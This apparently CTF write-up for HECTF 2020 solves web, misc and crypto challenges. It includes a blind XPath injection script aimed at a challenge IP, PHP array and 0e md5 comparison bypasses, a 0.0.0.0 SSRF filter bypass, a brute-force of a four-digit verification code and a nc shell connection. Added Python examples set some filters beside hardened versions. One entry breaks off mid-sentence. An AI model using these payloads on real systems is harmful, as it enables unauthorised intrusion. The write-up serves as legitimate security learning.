HECTF_2020
web1
Opening the challenge shows a login that wants a phone number. Viewing the source with F12 reveals a phone number in a comment, <-- 15970773575 -->; try the password-recovery flow. The hint in hint.php says the verification code has to be brute-forced and is 4 digits long.
Generate the dictionary with a script.
dz.py:
# dz.py: write every 4-digit code 0000-9999, one per line, as a Burp Intruder payload list
f = open('zidian.txt', 'w')
for i in range(10000):        # range(9999) would stop at 9998 and miss the code 9999
    s = str(i).zfill(4)       # left-pad to 4 digits: 7 -> '0007'
    print(s)
    f.write(s + '\n')
f.close()
Then run the list through Burp (bp) to brute-force the code.
The code is 0233; reset the password, log in and get the flag.
Ssrf
Viewing the source shows the filter:
ip2long('127.0.0.0')>>24==$int_ip>>24||ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
Tried url=http://localhost/flag.php with no result; url=http://0.0.0.0/flag.php bypassed the filter and returned the flag. The check is a blocklist of 127/8, 10/8, 172.16/12 and 192.168/16 only, and 0.0.0.0 matches none of them even though Linux delivers a connection to it to the local host.
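The filter above, reproduced in Python beside an allowlist-style check, as an added example that is not part of the writeup. The blocklist function is a line-for-line port of the challenge's PHP condition; the allowlist function and the sample destinations are my own, and the destination list is constructed (127.0.0.1 is what localhost resolves to, 0.0.0.0 is the bypass the writeup used).

```python
# Added example (not from the writeup): the challenge's blocklist reproduced in
# Python next to an allowlist check built on the standard ipaddress module, run
# over constructed sample destinations to show what each one lets through.
import ipaddress

def ip2long(addr):
    """Equivalent of PHP ip2long(): dotted quad -> 32-bit integer."""
    return int(ipaddress.IPv4Address(addr))

def blocklist_allows(addr):
    """The challenge's filter: only 127/8, 10/8, 172.16/12 and 192.168/16 are refused."""
    int_ip = ip2long(addr)
    blocked = (ip2long('127.0.0.0') >> 24 == int_ip >> 24
               or ip2long('10.0.0.0') >> 24 == int_ip >> 24
               or ip2long('172.16.0.0') >> 20 == int_ip >> 20
               or ip2long('192.168.0.0') >> 16 == int_ip >> 16)
    return not blocked

def allowlist_allows(addr):
    """Hardened check: accept only globally routable unicast addresses, so that
    0.0.0.0, 169.254.169.254 (cloud metadata), multicast and reserved ranges are
    all refused without having to enumerate them one by one."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast

# Constructed sample destinations (not from the writeup).
SAMPLES = ['127.0.0.1', '0.0.0.0', '169.254.169.254', '172.31.4.2', '93.184.216.34']

def compare(samples=SAMPLES):
    """Return {addr: (blocklist verdict, allowlist verdict)} for each sample."""
    return {a: (blocklist_allows(a), allowlist_allows(a)) for a in samples}

if __name__ == '__main__':
    for addr, (bl, al) in compare().items():
        print('%-16s blocklist=%-5s allowlist=%s' % (addr, bl, al))
```

Whichever check is used, it has to be applied to the address the client actually connects to (after DNS resolution) and re-applied on every redirect; ip_address() also accepts IPv6 literals, so ::1 is refused by the allowlist as well.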
injection
The challenge is called "injection", but SQL injection got nowhere; then the error message stood out: Warning: SimpleXMLElement::xpath():
The challenge description reads "X…X…X.Xpath! knock knock, are you admin? The flag format is flag{}." A quick search shows this is XPath injection; since nothing is echoed back, go blind.
import requests

url = 'http://114.55.165.246:8082/?'
r = requests.Session()
str_all = "qwertyuiopasdfghjklzxcvbnm0123456789_!{}-"

def password():
    """Blind XPath injection: recover the first user's password one character
    at a time. The response contains 'not admin' when the guessed character
    is correct, so that guess is appended and the next position is probed."""
    result = ""
    for i in range(1, 40):
        for j in str_all:
            payload = "'orsubstring((//user[position()=1]/password)," + str(i) + ",1)='" + j + "'or ''='"
            data = "username=" + payload + "&password=123"
            s = r.get(url + data + "&submit=%E7%99%BB%E5%BD%95")
            # print(data + "&submit=%E7%99%BB%E5%BD%95")
            if 'not admin' in s.text:
                result += j
                print(result)
                break

password()
Finally:
username=admin
password=339db714647a1d66b85cd08442287841
ezphp
Auditing the source shows:
if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){
This is bypassed with weak typing (the array trick): md5() given an array returns NULL with a warning, so NULL === NULL holds while the two arrays themselves differ:
param1[]=a&param2[]=s
On to the next step:
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
    $a = strtr($md5_1, 'cxhp', '0123');
    $b = strtr($md5_2, 'cxhp', '0123');
    if($a == $b){
        echo $flag;
    }
}
This is an md5 "collision" through loose comparison: bypass it with digests that start with 0e, which PHP's == treats as the number 0. It turns out to be a copy of an earlier challenge, 2019 NJUPT easyphp:
https://zhzhdoai.github.io/2019/11/24/WRITEUP-2019NJUPT-web%E9%A2%98%E8%A7%A3/
That gives str1=2120624&str2=240610708, so the final payload is: param1[]=a&param2[]=b&str1=2120624&str2=240610708
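To see exactly what the second gate does with those two values, the following added example (my code, not the writeup's) emulates PHP's loose string comparison and the strtr step in Python and runs the writeup's str1/str2 pair through it, next to a strict comparison that closes the hole. The numeric-string rule is simplified to the shapes a hex digest can take (digits, optional fraction, optional exponent); function names are my own.

```python
# Added example (not from the writeup): emulate the ezphp gate in Python to show
# why `==` on md5 digests is unsafe and how `===` / hash_equals() closes it.
import hashlib
import re

# PHP numeric-string grammar, reduced to what a hex digest can look like:
# digits with an optional fraction and an optional exponent. "0e123" is 0 * 10^123 = 0.
NUMERIC = re.compile(r'^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$')

def php_loose_eq(a, b):
    """Emulate PHP `$a == $b` on two strings: both numeric -> compared as numbers,
    otherwise compared as strings."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def php_strtr(s, frm, to):
    """PHP strtr($s, $from, $to) with equal-length arguments: per-character mapping."""
    return s.translate(str.maketrans(frm, to))

def challenge_gate(string_1, string_2):
    """The second ezphp gate as written in the challenge: True when $flag is echoed."""
    md5_1 = hashlib.md5(string_1.encode()).hexdigest()
    md5_2 = hashlib.md5(string_2.encode()).hexdigest()
    if not php_loose_eq(md5_1, md5_2):            # PHP's != is the negation of ==
        a = php_strtr(md5_1, 'cxhp', '0123')      # only 'c' can occur in a hex digest
        b = php_strtr(md5_2, 'cxhp', '0123')
        return php_loose_eq(a, b)
    return False

def hardened_gate(string_1, string_2):
    """Strict comparison (PHP === / hash_equals): no numeric-string coercion,
    so two different 0e... digests stay different."""
    md5_1 = hashlib.md5(string_1.encode()).hexdigest()
    md5_2 = hashlib.md5(string_2.encode()).hexdigest()
    return md5_1 == md5_2

if __name__ == '__main__':
    print('loose gate :', challenge_gate('2120624', '240610708'))
    print('strict gate:', hardened_gate('2120624', '240610708'))
```

Two digests that are both of the form 0e followed by digits (after c has become 0) compare as 0 == 0 under the loose rule; under the strict rule only byte-identical digests pass.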
[boom]Maybe_is_medium
Unintended solution: connecting with nc 121.196.32.184 12003 drops straight into a shell, which gives the flag.
easymaze
The usual maze challenge.
Reconstructing the maze:
1000011000
1100011100
0100010100
0111110100
0000110100
0000000100
0000000110
0000000010
0000000011
0000000001
0000000000
0000000000
00000000
Walking through it once gives the flag.
png
Opening the image on Kali reports IHDR: CRC error, so the width/height were probably changed. Copied to Windows, the image is visibly cut short; dragging it into WinHex and editing the width/height fields, as in the figure below:
After saving, half of the flag is visible; keep analysing the image. The strings command shows a base64 string at the end of the file; decode it at http://ctf.ssleye.com/ to get the other half of the flag.
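The CRC error the viewer reported is the check that exposes the edit: the IHDR CRC still belongs to the original dimensions. As an added example, not part of the writeup, here is that check and the height recovery done in Python rather than by hand in WinHex: the script builds a constructed PNG header (no image data), tampers with the height field, detects the mismatch, and searches for the height that makes the stored CRC match again. Function names and the 400x300 dimensions are assumptions; only the height is searched, the width is taken as stored.

```python
# Added example (not from the writeup): verify the IHDR CRC the way the Kali
# viewer did, and recover the true height by searching for the value that makes
# the stored CRC match again. The PNG below is constructed (header only).
import struct
import zlib

PNG_SIG = b'\x89PNG\r\n\x1a\n'

def make_ihdr(width, height, bit_depth=8, colour_type=2):
    """Build a well-formed IHDR chunk: length, type, 13 data bytes, CRC over type+data."""
    data = struct.pack('>IIBBBBB', width, height, bit_depth, colour_type, 0, 0, 0)
    crc = zlib.crc32(b'IHDR' + data) & 0xffffffff
    return struct.pack('>I', len(data)) + b'IHDR' + data + struct.pack('>I', crc)

def read_ihdr(png):
    """Return (width, height, stored_crc, computed_crc) of the IHDR chunk."""
    if png[:8] != PNG_SIG:
        raise ValueError('not a PNG')
    length, ctype = struct.unpack('>I4s', png[8:16])
    data = png[16:16 + length]
    stored = struct.unpack('>I', png[16 + length:20 + length])[0]
    computed = zlib.crc32(ctype + data) & 0xffffffff
    width, height = struct.unpack('>II', data[:8])
    return width, height, stored, computed

def ihdr_crc_ok(png):
    """True when the IHDR CRC matches its data; False means the header was edited."""
    _, _, stored, computed = read_ihdr(png)
    return stored == computed

def recover_height(png, max_height=10000):
    """If only the height field was edited, the stored CRC still belongs to the
    original IHDR: try heights until the CRC matches. Returns None if none does."""
    width, _, stored, _ = read_ihdr(png)
    rest = png[24:29]  # bit depth, colour type, compression, filter, interlace
    for h in range(1, max_height + 1):
        data = struct.pack('>II', width, h) + rest
        if zlib.crc32(b'IHDR' + data) & 0xffffffff == stored:
            return h
    return None

def set_height(png, height):
    """Rewrite the height field, leaving the CRC untouched (the WinHex edit)."""
    return png[:20] + struct.pack('>I', height) + png[24:]

ORIGINAL = PNG_SIG + make_ihdr(400, 300)   # constructed 400x300 header
TAMPERED = set_height(ORIGINAL, 150)       # height halved, CRC left as it was

if __name__ == '__main__':
    print('tampered CRC ok:', ihdr_crc_ok(TAMPERED))
    print('recovered height:', recover_height(TAMPERED))
```

On a real file the same read_ihdr() call works on the first 33 bytes; once the recovered height is written back, the viewer's CRC check passes and the hidden rows render.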
不说人话 (Not speaking human language)
The file is a string made of the characters !?.; decoding it at https://www.splitbrain.org/services/ook gives the flag.
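A string of only ! ? . is Short Ook!: each Ook! word reduced to its punctuation, with every pair of symbols mapping to one Brainfuck instruction. As an added example, not part of the writeup, here is a small decoder that does offline what the web service does, accepting both the full "Ook. Ook?" form and the short form. The sample program is constructed (it prints a single "A"); function names are my own.

```python
# Added example (not from the writeup): decode Ook! / Short Ook! by translating
# it to Brainfuck and running it on a small interpreter.

# Pairs of Ook punctuation -> Brainfuck instruction.
OOK_TO_BF = {'.?': '>', '?.': '<', '..': '+', '!!': '-',
             '!.': '.', '.!': ',', '!?': '[', '?!': ']'}

def ook_to_bf(src):
    """Accept full Ook! ("Ook. Ook?") or Short Ook ("!?.") and return Brainfuck.
    Only the punctuation carries meaning, so everything else is dropped."""
    syms = [ch for ch in src if ch in '.?!']
    if len(syms) % 2:
        raise ValueError('odd number of Ook symbols')
    return ''.join(OOK_TO_BF[a + b] for a, b in zip(syms[::2], syms[1::2]))

def run_bf(code, inp=b''):
    """Minimal Brainfuck interpreter: 30000 byte cells, wrapping arithmetic."""
    stack, jump = [], {}
    for i, c in enumerate(code):           # precompute matching brackets
        if c == '[':
            stack.append(i)
        elif c == ']':
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError('unbalanced brackets')
    tape, ptr, pc, out, inp = [0] * 30000, 0, 0, bytearray(), list(inp)
    while pc < len(code):
        c = code[pc]
        if c == '>':
            ptr += 1
        elif c == '<':
            ptr -= 1
        elif c == '+':
            tape[ptr] = (tape[ptr] + 1) & 0xff
        elif c == '-':
            tape[ptr] = (tape[ptr] - 1) & 0xff
        elif c == '.':
            out.append(tape[ptr])
        elif c == ',':
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == '[' and tape[ptr] == 0:
            pc = jump[pc]
        elif c == ']' and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return bytes(out)

def decode_ook(src):
    """Ook! or Short Ook! text -> the program's output as a string."""
    return run_bf(ook_to_bf(src)).decode('latin-1')

# Constructed Short Ook! program: Brainfuck ++++++++[>++++++++<-]>+. which prints "A".
SAMPLE = ('................' + '!?' + '.?' + '................'
          + '?.' + '!!' + '?!' + '.?' + '..' + '!.')

if __name__ == '__main__':
    print(decode_ook(SAMPLE))
```

Run it with the challenge file's contents as the argument of decode_ook() to recover the flag text without pasting it into a third-party site.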
在这里签到 (Sign in here)
Rabbit-decrypt with https://www.sojson.com/encrypt_rabbit.html,
then base64-decode; then base32-decode; finally hex-decode to get the flag.
no blank space
Once the organisers released the second hint, a quick search showed this is Baudot code.
Then take it to https
rsa
Given the public key (n, e) and the ciphertext c, first factor n into p and q with yafu;
then this script recovers the flag:
import gmpy2  # third-party: pip install gmpy2
p = 2499568793
q = 4568695582742345507136251229217400959960856046691733722988345503429689799935696593516299458516865110324638359470761456115925725067558499862591063153473862179550706262380644940013531317571260647226561004191266100720745936563550699000939117068559232225644277283541933064331891245169739139886735615435506152070330233107807124410892978280063993668726927377177983100529270996547002022341628251905780873531481682713820809147098305289391835297208890779643623465917824350382592808578978330348769060448006691307027594085634520759293965723855183484366752511654099121387261343686017189426761536281948007104498017003911
e = 65537
c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820
n = p * q
fn = (p - 1) * (q - 1)            # Euler's totient phi(n)
d = gmpy2.invert(e, fn)           # private exponent d = e^-1 mod phi(n)
m = gmpy2.powmod(c, d, n)         # m = c^d mod n
h = hex(int(m))[2:]
if len(h) % 2 == 1:
    h = '0' + h
s = bytes.fromhex(h)              # Python 3: str has no .decode('hex')
print(s)
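yafu finishes instantly here because the challenge's p is only a 32-bit prime. As an added example, not the writeup's script, the following shows why such a modulus is weak regardless of how large q is: Pollard's rho finds a factor of size p in roughly sqrt(p) steps, and the rest is the same textbook decryption as above, using only the standard library. The modulus is constructed from two Mersenne primes (2^31 - 1 standing in for a 32-bit p, 2^127 - 1 for q) rather than the challenge's numbers, and the message and function names are assumptions.

```python
# Added example (not from the writeup): factor a modulus with a 32-bit prime
# factor using Pollard's rho, then decrypt with the recovered private key.
from math import gcd

def pollard_rho(n, seed=2):
    """Pollard's rho with Floyd cycle detection; returns a non-trivial factor of n.
    Expected cost is about sqrt(p) iterations for the smallest prime factor p,
    so a 32-bit factor is found in tens of thousands of steps even when n is large."""
    if n % 2 == 0:
        return 2
    for c in range(1, 100):                    # retry with a new constant if a run degenerates
        f = lambda x: (x * x + c) % n
        x = y = seed
        d = 1
        while d == 1:
            x = f(x)                           # tortoise: one step
            y = f(f(y))                        # hare: two steps
            d = gcd(abs(x - y), n)
        if d != n:
            return d
    raise ValueError('no factor found')

def rsa_decrypt(c, e, p, q):
    """Textbook RSA: d = e^-1 mod phi(n), m = c^d mod n, returned as bytes."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, 'big')

P_DEMO = 2**31 - 1    # constructed: a 32-bit Mersenne prime, like the writeup's small p
Q_DEMO = 2**127 - 1   # constructed: a Mersenne prime standing in for the real q
E = 65537

def demo(msg=b'flag{demo}'):
    """Encrypt a constructed message, then recover it knowing only (n, e, c)."""
    n = P_DEMO * Q_DEMO
    c = pow(int.from_bytes(msg, 'big'), E, n)
    p = pollard_rho(n)                         # the only step that needs n to be weak
    q = n // p
    return rsa_decrypt(c, E, p, q)

if __name__ == '__main__':
    print(demo())
```

The message must be shorter than the modulus (10 bytes against a ~158-bit n here); with the challenge's own n and c the same rsa_decrypt() call reproduces the script above.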